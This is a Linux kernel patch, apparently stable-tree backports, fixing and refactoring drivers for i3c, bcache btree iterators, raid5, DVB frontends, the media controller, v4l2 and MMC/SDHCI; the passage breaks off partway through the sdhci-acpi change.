+diff --git a/drivers/i3c/master/svc-i3c-master.c b/drivers/i3c/master/svc-i3c-master.c
+index f30d457e91196..e71c90e5ac60c 100644
+--- a/drivers/i3c/master/svc-i3c-master.c
++++ b/drivers/i3c/master/svc-i3c-master.c
+@@ -397,6 +397,19 @@ static void svc_i3c_master_ibi_work(struct work_struct *work)
+ 	int ret;
+ 
+ 	mutex_lock(&master->lock);
++	/*
++	 * IBIWON may be set before SVC_I3C_MCTRL_REQUEST_AUTO_IBI, causing
++	 * readl_relaxed_poll_timeout() to return immediately. Consequently,
++	 * ibitype will be 0 since it was last updated only after the 8th SCL
++	 * cycle, leading to missed client IBI handlers.
++	 *
++	 * A typical scenario is when IBIWON occurs and bus arbitration is lost
++	 * at svc_i3c_master_priv_xfers().
++	 *
++	 * Clear SVC_I3C_MINT_IBIWON before sending SVC_I3C_MCTRL_REQUEST_AUTO_IBI.
++	 */
++	writel(SVC_I3C_MINT_IBIWON, master->regs + SVC_I3C_MSTATUS);
++
+ 	/* Acknowledge the incoming interrupt with the AUTOIBI mechanism */
+ 	writel(SVC_I3C_MCTRL_REQUEST_AUTO_IBI |
+ 	       SVC_I3C_MCTRL_IBIRESP_AUTO,
+@@ -411,9 +424,6 @@ static void svc_i3c_master_ibi_work(struct work_struct *work)
+ 		goto reenable_ibis;
+ 	}
+ 
+-	/* Clear the interrupt status */
+-	writel(SVC_I3C_MINT_IBIWON, master->regs + SVC_I3C_MSTATUS);
+-
+ 	status = readl(master->regs + SVC_I3C_MSTATUS);
+ 	ibitype = SVC_I3C_MSTATUS_IBITYPE(status);
+ 	ibiaddr = SVC_I3C_MSTATUS_IBIADDR(status);
+diff --git a/drivers/md/bcache/bset.c b/drivers/md/bcache/bset.c
+index 2bba4d6aaaa28..463eb13bd0b2a 100644
+--- a/drivers/md/bcache/bset.c
++++ b/drivers/md/bcache/bset.c
+@@ -54,7 +54,7 @@ void bch_dump_bucket(struct btree_keys *b)
+ int __bch_count_data(struct btree_keys *b)
+ {
+ 	unsigned int ret = 0;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct bkey *k;
+ 
+ 	if (b->ops->is_extents)
+@@ -67,7 +67,7 @@ void __bch_check_keys(struct btree_keys *b, const char *fmt, ...)
+ {
+ 	va_list args;
+ 	struct bkey *k, *p = NULL;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	const char *err;
+ 
+ 	for_each_key(b, k, &iter) {
+@@ -879,7 +879,7 @@ unsigned int bch_btree_insert_key(struct btree_keys *b, struct bkey *k,
+ 	unsigned int status = BTREE_INSERT_STATUS_NO_INSERT;
+ 	struct bset *i = bset_tree_last(b)->data;
+ 	struct bkey *m, *prev = NULL;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct bkey preceding_key_on_stack = ZERO_KEY;
+ 	struct bkey *preceding_key_p = &preceding_key_on_stack;
+ 
+@@ -895,9 +895,9 @@ unsigned int bch_btree_insert_key(struct btree_keys *b, struct bkey *k,
+ 	else
+ 		preceding_key(k, &preceding_key_p);
+ 
+-	m = bch_btree_iter_init(b, &iter, preceding_key_p);
++	m = bch_btree_iter_stack_init(b, &iter, preceding_key_p);
+ 
+-	if (b->ops->insert_fixup(b, k, &iter, replace_key))
++	if (b->ops->insert_fixup(b, k, &iter.iter, replace_key))
+ 		return status;
+ 
+ 	status = BTREE_INSERT_STATUS_INSERT;
+@@ -1100,33 +1100,33 @@ void bch_btree_iter_push(struct btree_iter *iter, struct bkey *k,
+ 				 btree_iter_cmp));
+ }
+ 
+-static struct bkey *__bch_btree_iter_init(struct btree_keys *b,
+-					  struct btree_iter *iter,
+-					  struct bkey *search,
+-					  struct bset_tree *start)
++static struct bkey *__bch_btree_iter_stack_init(struct btree_keys *b,
++						struct btree_iter_stack *iter,
++						struct bkey *search,
++						struct bset_tree *start)
+ {
+ 	struct bkey *ret = NULL;
+ 
+-	iter->size = ARRAY_SIZE(iter->data);
+-	iter->used = 0;
++	iter->iter.size = ARRAY_SIZE(iter->stack_data);
++	iter->iter.used = 0;
+ 
+ #ifdef CONFIG_BCACHE_DEBUG
+-	iter->b = b;
++	iter->iter.b = b;
+ #endif
+ 
+ 	for (; start <= bset_tree_last(b); start++) {
+ 		ret = bch_bset_search(b, start, search);
+-		bch_btree_iter_push(iter, ret, bset_bkey_last(start->data));
++		bch_btree_iter_push(&iter->iter, ret, bset_bkey_last(start->data));
+ 	}
+ 
+ 	return ret;
+ }
+ 
+-struct bkey *bch_btree_iter_init(struct btree_keys *b,
+-				 struct btree_iter *iter,
++struct bkey *bch_btree_iter_stack_init(struct btree_keys *b,
++				 struct btree_iter_stack *iter,
+ 				 struct bkey *search)
+ {
+-	return __bch_btree_iter_init(b, iter, search, b->set);
++	return __bch_btree_iter_stack_init(b, iter, search, b->set);
+ }
+ 
+ static inline struct bkey *__bch_btree_iter_next(struct btree_iter *iter,
+@@ -1293,10 +1293,10 @@ void bch_btree_sort_partial(struct btree_keys *b, unsigned int start,
+ 			    struct bset_sort_state *state)
+ {
+ 	size_t order = b->page_order, keys = 0;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	int oldsize = bch_count_data(b);
+ 
+-	__bch_btree_iter_init(b, &iter, NULL, &b->set[start]);
++	__bch_btree_iter_stack_init(b, &iter, NULL, &b->set[start]);
+ 
+ 	if (start) {
+ 		unsigned int i;
+@@ -1307,7 +1307,7 @@ void bch_btree_sort_partial(struct btree_keys *b, unsigned int start,
+ 		order = get_order(__set_bytes(b->set->data, keys));
+ 	}
+ 
+-	__btree_sort(b, &iter, start, order, false, state);
++	__btree_sort(b, &iter.iter, start, order, false, state);
+ 
+ 	EBUG_ON(oldsize >= 0 && bch_count_data(b) != oldsize);
+ }
+@@ -1323,11 +1323,11 @@ void bch_btree_sort_into(struct btree_keys *b, struct btree_keys *new,
+ 			 struct bset_sort_state *state)
+ {
+ 	uint64_t start_time = local_clock();
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 
+-	bch_btree_iter_init(b, &iter, NULL);
++	bch_btree_iter_stack_init(b, &iter, NULL);
+ 
+-	btree_mergesort(b, new->set->data, &iter, false, true);
++	btree_mergesort(b, new->set->data, &iter.iter, false, true);
+ 
+ 	bch_time_stats_update(&state->time, start_time);
+ 
+diff --git a/drivers/md/bcache/bset.h b/drivers/md/bcache/bset.h
+index d795c84246b01..011f6062c4c04 100644
+--- a/drivers/md/bcache/bset.h
++++ b/drivers/md/bcache/bset.h
+@@ -321,7 +321,14 @@ struct btree_iter {
+ #endif
+ 	struct btree_iter_set {
+ 		struct bkey *k, *end;
+-	} data[MAX_BSETS];
++	} data[];
++};
++
++/* Fixed-size btree_iter that can be allocated on the stack */
++
++struct btree_iter_stack {
++	struct btree_iter iter;
++	struct btree_iter_set stack_data[MAX_BSETS];
+ };
+ 
+ typedef bool (*ptr_filter_fn)(struct btree_keys *b, const struct bkey *k);
+@@ -333,9 +340,9 @@ struct bkey *bch_btree_iter_next_filter(struct btree_iter *iter,
+ 
+ void bch_btree_iter_push(struct btree_iter *iter, struct bkey *k,
+ 			 struct bkey *end);
+-struct bkey *bch_btree_iter_init(struct btree_keys *b,
+-				 struct btree_iter *iter,
+-				 struct bkey *search);
++struct bkey *bch_btree_iter_stack_init(struct btree_keys *b,
++				       struct btree_iter_stack *iter,
++				       struct bkey *search);
+ 
+ struct bkey *__bch_bset_search(struct btree_keys *b, struct bset_tree *t,
+ 			       const struct bkey *search);
+@@ -350,13 +357,14 @@ static inline struct bkey *bch_bset_search(struct btree_keys *b,
+ 	return search ? __bch_bset_search(b, t, search) : t->data->start;
+ }
+ 
+-#define for_each_key_filter(b, k, iter, filter)				\
+-	for (bch_btree_iter_init((b), (iter), NULL);			\
+-	     ((k) = bch_btree_iter_next_filter((iter), (b), filter));)
++#define for_each_key_filter(b, k, stack_iter, filter)                      \
++	for (bch_btree_iter_stack_init((b), (stack_iter), NULL);           \
++	     ((k) = bch_btree_iter_next_filter(&((stack_iter)->iter), (b), \
++					       filter));)
+ 
+-#define for_each_key(b, k, iter)					\
+-	for (bch_btree_iter_init((b), (iter), NULL);			\
+-	     ((k) = bch_btree_iter_next(iter));)
++#define for_each_key(b, k, stack_iter)                           \
++	for (bch_btree_iter_stack_init((b), (stack_iter), NULL); \
++	     ((k) = bch_btree_iter_next(&((stack_iter)->iter)));)
+ 
+ /* Sorting */
+ 
+diff --git a/drivers/md/bcache/btree.c b/drivers/md/bcache/btree.c
+index 6a2f57ae0f3c2..d680c810e5e12 100644
+--- a/drivers/md/bcache/btree.c
++++ b/drivers/md/bcache/btree.c
+@@ -1283,7 +1283,7 @@ static bool btree_gc_mark_node(struct btree *b, struct gc_stat *gc)
+ 	uint8_t stale = 0;
+ 	unsigned int keys = 0, good_keys = 0;
+ 	struct bkey *k;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct bset_tree *t;
+ 
+ 	gc->nodes++;
+@@ -1544,7 +1544,7 @@ static int btree_gc_rewrite_node(struct btree *b, struct btree_op *op,
+ static unsigned int btree_gc_count_keys(struct btree *b)
+ {
+ 	struct bkey *k;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	unsigned int ret = 0;
+ 
+ 	for_each_key_filter(&b->keys, k, &iter, bch_ptr_bad)
+@@ -1585,17 +1585,18 @@ static int btree_gc_recurse(struct btree *b, struct btree_op *op,
+ 	int ret = 0;
+ 	bool should_rewrite;
+ 	struct bkey *k;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct gc_merge_info r[GC_MERGE_NODES];
+ 	struct gc_merge_info *i, *last = r + ARRAY_SIZE(r) - 1;
+ 
+-	bch_btree_iter_init(&b->keys, &iter, &b->c->gc_done);
++	bch_btree_iter_stack_init(&b->keys, &iter, &b->c->gc_done);
+ 
+ 	for (i = r; i < r + ARRAY_SIZE(r); i++)
+ 		i->b = ERR_PTR(-EINTR);
+ 
+ 	while (1) {
+-		k = bch_btree_iter_next_filter(&iter, &b->keys, bch_ptr_bad);
++		k = bch_btree_iter_next_filter(&iter.iter, &b->keys,
++					       bch_ptr_bad);
+ 		if (k) {
+ 			r->b = bch_btree_node_get(b->c, op, k, b->level - 1,
+ 						  true, b);
+@@ -1885,7 +1886,7 @@ static int bch_btree_check_recurse(struct btree *b, struct btree_op *op)
+ {
+ 	int ret = 0;
+ 	struct bkey *k, *p = NULL;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 
+ 	for_each_key_filter(&b->keys, k, &iter, bch_ptr_invalid)
+ 		bch_initial_mark_key(b->c, b->level, k);
+@@ -1893,10 +1894,10 @@ static int bch_btree_check_recurse(struct btree *b, struct btree_op *op)
+ 	bch_initial_mark_key(b->c, b->level + 1, &b->key);
+ 
+ 	if (b->level) {
+-		bch_btree_iter_init(&b->keys, &iter, NULL);
++		bch_btree_iter_stack_init(&b->keys, &iter, NULL);
+ 
+ 		do {
+-			k = bch_btree_iter_next_filter(&iter, &b->keys,
++			k = bch_btree_iter_next_filter(&iter.iter, &b->keys,
+ 						       bch_ptr_bad);
+ 			if (k) {
+ 				btree_node_prefetch(b, k);
+@@ -1924,7 +1925,7 @@ static int bch_btree_check_thread(void *arg)
+ 	struct btree_check_info *info = arg;
+ 	struct btree_check_state *check_state = info->state;
+ 	struct cache_set *c = check_state->c;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct bkey *k, *p;
+ 	int cur_idx, prev_idx, skip_nr;
+ 
+@@ -1933,8 +1934,8 @@ static int bch_btree_check_thread(void *arg)
+ 	ret = 0;
+ 
+ 	/* root node keys are checked before thread created */
+-	bch_btree_iter_init(&c->root->keys, &iter, NULL);
+-	k = bch_btree_iter_next_filter(&iter, &c->root->keys, bch_ptr_bad);
++	bch_btree_iter_stack_init(&c->root->keys, &iter, NULL);
++	k = bch_btree_iter_next_filter(&iter.iter, &c->root->keys, bch_ptr_bad);
+ 	BUG_ON(!k);
+ 
+ 	p = k;
+@@ -1952,7 +1953,7 @@ static int bch_btree_check_thread(void *arg)
+ 		skip_nr = cur_idx - prev_idx;
+ 
+ 		while (skip_nr) {
+-			k = bch_btree_iter_next_filter(&iter,
++			k = bch_btree_iter_next_filter(&iter.iter,
+ 						       &c->root->keys,
+ 						       bch_ptr_bad);
+ 			if (k)
+@@ -2025,7 +2026,7 @@ int bch_btree_check(struct cache_set *c)
+ 	int ret = 0;
+ 	int i;
+ 	struct bkey *k = NULL;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct btree_check_state check_state;
+ 
+ 	/* check and mark root node keys */
+@@ -2521,11 +2522,11 @@ static int bch_btree_map_nodes_recurse(struct btree *b, struct btree_op *op,
+ 
+ 	if (b->level) {
+ 		struct bkey *k;
+-		struct btree_iter iter;
++		struct btree_iter_stack iter;
+ 
+-		bch_btree_iter_init(&b->keys, &iter, from);
++		bch_btree_iter_stack_init(&b->keys, &iter, from);
+ 
+-		while ((k = bch_btree_iter_next_filter(&iter, &b->keys,
++		while ((k = bch_btree_iter_next_filter(&iter.iter, &b->keys,
+ 						       bch_ptr_bad))) {
+ 			ret = bcache_btree(map_nodes_recurse, k, b,
+ 				    op, from, fn, flags);
+@@ -2554,11 +2555,12 @@ int bch_btree_map_keys_recurse(struct btree *b, struct btree_op *op,
+ {
+ 	int ret = MAP_CONTINUE;
+ 	struct bkey *k;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 
+-	bch_btree_iter_init(&b->keys, &iter, from);
++	bch_btree_iter_stack_init(&b->keys, &iter, from);
+ 
+-	while ((k = bch_btree_iter_next_filter(&iter, &b->keys, bch_ptr_bad))) {
++	while ((k = bch_btree_iter_next_filter(&iter.iter, &b->keys,
++					       bch_ptr_bad))) {
+ 		ret = !b->level
+ 			? fn(op, b, k)
+ 			: bcache_btree(map_keys_recurse, k,
+diff --git a/drivers/md/bcache/super.c b/drivers/md/bcache/super.c
+index 70e5bd8961d2f..659f6777b9737 100644
+--- a/drivers/md/bcache/super.c
++++ b/drivers/md/bcache/super.c
+@@ -1915,8 +1915,9 @@ struct cache_set *bch_cache_set_alloc(struct cache_sb *sb)
+ 	INIT_LIST_HEAD(&c->btree_cache_freed);
+ 	INIT_LIST_HEAD(&c->data_buckets);
+ 
+-	iter_size = ((meta_bucket_pages(sb) * PAGE_SECTORS) / sb->block_size + 1) *
+-		sizeof(struct btree_iter_set);
++	iter_size = sizeof(struct btree_iter) +
++		    ((meta_bucket_pages(sb) * PAGE_SECTORS) / sb->block_size) *
++			    sizeof(struct btree_iter_set);
+ 
+ 	c->devices = kcalloc(c->nr_uuids, sizeof(void *), GFP_KERNEL);
+ 	if (!c->devices)
+diff --git a/drivers/md/bcache/sysfs.c b/drivers/md/bcache/sysfs.c
+index 025fe6479bb68..15749ba958c80 100644
+--- a/drivers/md/bcache/sysfs.c
++++ b/drivers/md/bcache/sysfs.c
+@@ -660,7 +660,7 @@ static unsigned int bch_root_usage(struct cache_set *c)
+ 	unsigned int bytes = 0;
+ 	struct bkey *k;
+ 	struct btree *b;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 
+ 	goto lock_root;
+ 
+diff --git a/drivers/md/bcache/writeback.c b/drivers/md/bcache/writeback.c
+index 18c6e0d2877b5..6081dc6fd0132 100644
+--- a/drivers/md/bcache/writeback.c
++++ b/drivers/md/bcache/writeback.c
+@@ -908,15 +908,15 @@ static int bch_dirty_init_thread(void *arg)
+ 	struct dirty_init_thrd_info *info = arg;
+ 	struct bch_dirty_init_state *state = info->state;
+ 	struct cache_set *c = state->c;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct bkey *k, *p;
+ 	int cur_idx, prev_idx, skip_nr;
+ 
+ 	k = p = NULL;
+ 	prev_idx = 0;
+ 
+-	bch_btree_iter_init(&c->root->keys, &iter, NULL);
+-	k = bch_btree_iter_next_filter(&iter, &c->root->keys, bch_ptr_bad);
++	bch_btree_iter_stack_init(&c->root->keys, &iter, NULL);
++	k = bch_btree_iter_next_filter(&iter.iter, &c->root->keys, bch_ptr_bad);
+ 	BUG_ON(!k);
+ 
+ 	p = k;
+@@ -930,7 +930,7 @@ static int bch_dirty_init_thread(void *arg)
+ 		skip_nr = cur_idx - prev_idx;
+ 
+ 		while (skip_nr) {
+-			k = bch_btree_iter_next_filter(&iter,
++			k = bch_btree_iter_next_filter(&iter.iter,
+ 						       &c->root->keys,
+ 						       bch_ptr_bad);
+ 			if (k)
+@@ -979,7 +979,7 @@ void bch_sectors_dirty_init(struct bcache_device *d)
+ 	int i;
+ 	struct btree *b = NULL;
+ 	struct bkey *k = NULL;
+-	struct btree_iter iter;
++	struct btree_iter_stack iter;
+ 	struct sectors_dirty_init op;
+ 	struct cache_set *c = d->c;
+ 	struct bch_dirty_init_state state;
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index 8cf2317857e0a..ed99b449d8fd4 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -36,7 +36,6 @@
+  */
+ 
+ #include <linux/blkdev.h>
+-#include <linux/delay.h>
+ #include <linux/kthread.h>
+ #include <linux/raid/pq.h>
+ #include <linux/async_tx.h>
+@@ -6797,6 +6796,9 @@ static void raid5d(struct md_thread *thread)
+ 		int batch_size, released;
+ 		unsigned int offset;
+ 
++		if (test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags))
++			break;
++
+ 		released = release_stripe_list(conf, conf->temp_inactive_list);
+ 		if (released)
+ 			clear_bit(R5_DID_ALLOC, &conf->cache_state);
+@@ -6833,18 +6835,7 @@ static void raid5d(struct md_thread *thread)
+ 			spin_unlock_irq(&conf->device_lock);
+ 			md_check_recovery(mddev);
+ 			spin_lock_irq(&conf->device_lock);
+-
+-			/*
+-			 * Waiting on MD_SB_CHANGE_PENDING below may deadlock
+-			 * seeing md_check_recovery() is needed to clear
+-			 * the flag when using mdmon.
+-			 */
+-			continue;
+ 		}
+-
+-		wait_event_lock_irq(mddev->sb_wait,
+-			!test_bit(MD_SB_CHANGE_PENDING, &mddev->sb_flags),
+-			conf->device_lock);
+ 	}
+ 	pr_debug("%d stripes handled\n", handled);
+ 
+diff --git a/drivers/media/dvb-frontends/lgdt3306a.c b/drivers/media/dvb-frontends/lgdt3306a.c
+index 6dfa8b18ed671..fccadfcd76bef 100644
+--- a/drivers/media/dvb-frontends/lgdt3306a.c
++++ b/drivers/media/dvb-frontends/lgdt3306a.c
+@@ -2177,6 +2177,11 @@ static int lgdt3306a_probe(struct i2c_client *client,
+ 	struct dvb_frontend *fe;
+ 	int ret;
+ 
++	if (!client->dev.platform_data) {
++		dev_err(&client->dev, "platform data is mandatory\n");
++		return -EINVAL;
++	}
++
+ 	config = kmemdup(client->dev.platform_data,
+ 			 sizeof(struct lgdt3306a_config), GFP_KERNEL);
+ 	if (config == NULL) {
+diff --git a/drivers/media/dvb-frontends/mxl5xx.c b/drivers/media/dvb-frontends/mxl5xx.c
+index 934d1c0b214ae..1adadad172c04 100644
+--- a/drivers/media/dvb-frontends/mxl5xx.c
++++ b/drivers/media/dvb-frontends/mxl5xx.c
+@@ -1381,57 +1381,57 @@ static int config_ts(struct mxl *state, enum MXL_HYDRA_DEMOD_ID_E demod_id,
+ 	u32 nco_count_min = 0;
+ 	u32 clk_type = 0;
+ 
+-	struct MXL_REG_FIELD_T xpt_sync_polarity[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_sync_polarity[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700010, 8, 1}, {0x90700010, 9, 1},
+ 		{0x90700010, 10, 1}, {0x90700010, 11, 1},
+ 		{0x90700010, 12, 1}, {0x90700010, 13, 1},
+ 		{0x90700010, 14, 1}, {0x90700010, 15, 1} };
+-	struct MXL_REG_FIELD_T xpt_clock_polarity[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_clock_polarity[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700010, 16, 1}, {0x90700010, 17, 1},
+ 		{0x90700010, 18, 1}, {0x90700010, 19, 1},
+ 		{0x90700010, 20, 1}, {0x90700010, 21, 1},
+ 		{0x90700010, 22, 1}, {0x90700010, 23, 1} };
+-	struct MXL_REG_FIELD_T xpt_valid_polarity[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_valid_polarity[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700014, 0, 1}, {0x90700014, 1, 1},
+ 		{0x90700014, 2, 1}, {0x90700014, 3, 1},
+ 		{0x90700014, 4, 1}, {0x90700014, 5, 1},
+ 		{0x90700014, 6, 1}, {0x90700014, 7, 1} };
+-	struct MXL_REG_FIELD_T xpt_ts_clock_phase[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_ts_clock_phase[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700018, 0, 3}, {0x90700018, 4, 3},
+ 		{0x90700018, 8, 3}, {0x90700018, 12, 3},
+ 		{0x90700018, 16, 3}, {0x90700018, 20, 3},
+ 		{0x90700018, 24, 3}, {0x90700018, 28, 3} };
+-	struct MXL_REG_FIELD_T xpt_lsb_first[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_lsb_first[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x9070000C, 16, 1}, {0x9070000C, 17, 1},
+ 		{0x9070000C, 18, 1}, {0x9070000C, 19, 1},
+ 		{0x9070000C, 20, 1}, {0x9070000C, 21, 1},
+ 		{0x9070000C, 22, 1}, {0x9070000C, 23, 1} };
+-	struct MXL_REG_FIELD_T xpt_sync_byte[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_sync_byte[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700010, 0, 1}, {0x90700010, 1, 1},
+ 		{0x90700010, 2, 1}, {0x90700010, 3, 1},
+ 		{0x90700010, 4, 1}, {0x90700010, 5, 1},
+ 		{0x90700010, 6, 1}, {0x90700010, 7, 1} };
+-	struct MXL_REG_FIELD_T xpt_enable_output[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_enable_output[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x9070000C, 0, 1}, {0x9070000C, 1, 1},
+ 		{0x9070000C, 2, 1}, {0x9070000C, 3, 1},
+ 		{0x9070000C, 4, 1}, {0x9070000C, 5, 1},
+ 		{0x9070000C, 6, 1}, {0x9070000C, 7, 1} };
+-	struct MXL_REG_FIELD_T xpt_err_replace_sync[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_err_replace_sync[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x9070000C, 24, 1}, {0x9070000C, 25, 1},
+ 		{0x9070000C, 26, 1}, {0x9070000C, 27, 1},
+ 		{0x9070000C, 28, 1}, {0x9070000C, 29, 1},
+ 		{0x9070000C, 30, 1}, {0x9070000C, 31, 1} };
+-	struct MXL_REG_FIELD_T xpt_err_replace_valid[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_err_replace_valid[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700014, 8, 1}, {0x90700014, 9, 1},
+ 		{0x90700014, 10, 1}, {0x90700014, 11, 1},
+ 		{0x90700014, 12, 1}, {0x90700014, 13, 1},
+ 		{0x90700014, 14, 1}, {0x90700014, 15, 1} };
+-	struct MXL_REG_FIELD_T xpt_continuous_clock[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_continuous_clock[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x907001D4, 0, 1}, {0x907001D4, 1, 1},
+ 		{0x907001D4, 2, 1}, {0x907001D4, 3, 1},
+ 		{0x907001D4, 4, 1}, {0x907001D4, 5, 1},
+ 		{0x907001D4, 6, 1}, {0x907001D4, 7, 1} };
+-	struct MXL_REG_FIELD_T xpt_nco_clock_rate[MXL_HYDRA_DEMOD_MAX] = {
++	static const struct MXL_REG_FIELD_T xpt_nco_clock_rate[MXL_HYDRA_DEMOD_MAX] = {
+ 		{0x90700044, 16, 80}, {0x90700044, 16, 81},
+ 		{0x90700044, 16, 82}, {0x90700044, 16, 83},
+ 		{0x90700044, 16, 84}, {0x90700044, 16, 85},
+diff --git a/drivers/media/mc/mc-devnode.c b/drivers/media/mc/mc-devnode.c
+index 680fbb3a93402..94abd042045da 100644
+--- a/drivers/media/mc/mc-devnode.c
++++ b/drivers/media/mc/mc-devnode.c
+@@ -246,15 +246,14 @@ int __must_check media_devnode_register(struct media_device *mdev,
+ 	kobject_set_name(&devnode->cdev.kobj, "media%d", devnode->minor);
+ 
+ 	/* Part 3: Add the media and char device */
++	set_bit(MEDIA_FLAG_REGISTERED, &devnode->flags);
+ 	ret = cdev_device_add(&devnode->cdev, &devnode->dev);
+ 	if (ret < 0) {
++		clear_bit(MEDIA_FLAG_REGISTERED, &devnode->flags);
+ 		pr_err("%s: cdev_device_add failed\n", __func__);
+ 		goto cdev_add_error;
+ 	}
+ 
+-	/* Part 4: Activate this minor. The char device can now be used. */
+-	set_bit(MEDIA_FLAG_REGISTERED, &devnode->flags);
+-
+ 	return 0;
+ 
+ cdev_add_error:
+diff --git a/drivers/media/mc/mc-entity.c b/drivers/media/mc/mc-entity.c
+index 8919df09e3e8d..bdb8f512be578 100644
+--- a/drivers/media/mc/mc-entity.c
++++ b/drivers/media/mc/mc-entity.c
+@@ -593,6 +593,12 @@ static int media_pipeline_explore_next_link(struct media_pipeline *pipe,
+ 	link = list_entry(entry->links, typeof(*link), list);
+ 	last_link = media_pipeline_walk_pop(walk);
+ 
++	if ((link->flags & MEDIA_LNK_FL_LINK_TYPE) != MEDIA_LNK_FL_DATA_LINK) {
++		dev_dbg(walk->mdev->dev,
++			"media pipeline: skipping link (not data-link)\n");
++		return 0;
++	}
++
+ 	dev_dbg(walk->mdev->dev,
+ 		"media pipeline: exploring link '%s':%u -> '%s':%u\n",
+ 		link->source->entity->name, link->source->index,
+diff --git a/drivers/media/v4l2-core/v4l2-dev.c b/drivers/media/v4l2-core/v4l2-dev.c
+index 397d553177fa7..e73c749c99bd5 100644
+--- a/drivers/media/v4l2-core/v4l2-dev.c
++++ b/drivers/media/v4l2-core/v4l2-dev.c
+@@ -1033,8 +1033,10 @@ int __video_register_device(struct video_device *vdev,
+ 	vdev->dev.devt = MKDEV(VIDEO_MAJOR, vdev->minor);
+ 	vdev->dev.parent = vdev->dev_parent;
+ 	dev_set_name(&vdev->dev, "%s%d", name_base, vdev->num);
++	mutex_lock(&videodev_lock);
+ 	ret = device_register(&vdev->dev);
+ 	if (ret < 0) {
++		mutex_unlock(&videodev_lock);
+ 		pr_err("%s: device_register failed\n", __func__);
+ 		goto cleanup;
+ 	}
+@@ -1054,6 +1056,7 @@ int __video_register_device(struct video_device *vdev,
+ 
+ 	/* Part 6: Activate this minor. The char device can now be used. */
+ 	set_bit(V4L2_FL_REGISTERED, &vdev->flags);
++	mutex_unlock(&videodev_lock);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/mmc/core/host.c b/drivers/mmc/core/host.c
+index 25c152ef5d60e..67230d486c283 100644
+--- a/drivers/mmc/core/host.c
++++ b/drivers/mmc/core/host.c
+@@ -119,13 +119,12 @@ void mmc_retune_enable(struct mmc_host *host)
+ 
+ /*
+  * Pause re-tuning for a small set of operations.  The pause begins after the
+- * next command and after first doing re-tuning.
++ * next command.
+  */
+ void mmc_retune_pause(struct mmc_host *host)
+ {
+ 	if (!host->retune_paused) {
+ 		host->retune_paused = 1;
+-		mmc_retune_needed(host);
+ 		mmc_retune_hold(host);
+ 	}
+ }
+diff --git a/drivers/mmc/core/slot-gpio.c b/drivers/mmc/core/slot-gpio.c
+index e3c69c6b85a6c..d5145c1ee81e7 100644
+--- a/drivers/mmc/core/slot-gpio.c
++++ b/drivers/mmc/core/slot-gpio.c
+@@ -206,6 +206,26 @@ int mmc_gpiod_request_cd(struct mmc_host *host, const char *con_id,
+ }
+ EXPORT_SYMBOL(mmc_gpiod_request_cd);
+ 
++/**
++ * mmc_gpiod_set_cd_config - set config for card-detection GPIO
++ * @host: mmc host
++ * @config: Generic pinconf config (from pinconf_to_config_packed())
++ *
++ * This can be used by mmc host drivers to fixup a card-detection GPIO's config
++ * (e.g. set PIN_CONFIG_BIAS_PULL_UP) after acquiring the GPIO descriptor
++ * through mmc_gpiod_request_cd().
++ *
++ * Returns:
++ * 0 on success, or a negative errno value on error.
++ */
++int mmc_gpiod_set_cd_config(struct mmc_host *host, unsigned long config)
++{
++	struct mmc_gpio *ctx = host->slot.handler_priv;
++
++	return gpiod_set_config(ctx->cd_gpio, config);
++}
++EXPORT_SYMBOL(mmc_gpiod_set_cd_config);
++
+ bool mmc_can_gpio_cd(struct mmc_host *host)
+ {
+ 	struct mmc_gpio *ctx = host->slot.handler_priv;
+diff --git a/drivers/mmc/host/sdhci-acpi.c b/drivers/mmc/host/sdhci-acpi.c
+index b917060a258a4..eea0a7ddb5514 100644
+--- a/drivers/mmc/host/sdhci-acpi.c
++++ b/drivers/mmc/host/sdhci-acpi.c
+@@ -10,6 +10,7 @@
+ #include <linux/export.h>
+ #include <linux/module.h>
+ #include <linux/device.h>
++#include <linux/pinctrl/pinconf-generic.h>
+ #include <linux/platform_device.h>
+ #include <linux/ioport.h>
+ #include <linux/io.h>
+@@ -80,6 +81,8 @@ struct sdhci_acpi_host {
+ enum {
+ 	DMI_QUIRK_RESET_SD_SIGNAL_VOLT_ON_SUSP			= BIT(0),
